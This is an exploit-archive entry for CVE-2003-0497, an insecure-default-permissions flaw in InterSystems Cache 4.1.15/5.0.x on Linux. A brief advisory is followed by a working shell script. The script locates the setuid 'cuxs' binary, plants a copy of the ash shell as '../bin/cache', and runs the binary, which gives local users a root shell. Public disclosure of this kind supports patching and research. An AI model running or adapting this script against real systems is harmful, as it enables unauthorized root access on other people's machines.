InterSystems Cache 4.1.15/5.0.x - Insecure Default Permissions

Author: Larry W. Cashdollar
type: local
platform: linux
port: 
date_added: 2003-07-01 
date_updated: 2012-11-20 
verified: 1 
codes: CVE-2003-0497;OSVDB-2229 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/8070/info

It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges.

#!/bin/sh
# kokaninATdtors playing with 5.0.2.607.1_linux_su.tar (cache) on leenooks.
# this started as an exploit for scenario1 in
# http://www.idefense.com/advisory/07.01.03.txt, but ended up as something else
# A snippetisnip from an strace of the cuxs binary shows:
# execve("../bin/cache", ["cache"], [/* 19 vars */])
# -------^^^^^^^^^^^^^^------- which is stupid stupid stupid since cuxs is +s

TARGET=`find / -type f -name cuxs -perm -4000 2>/dev/null`
mkdir -p crapche/bin
cd crapche/bin
cp `which ash` cache
$TARGET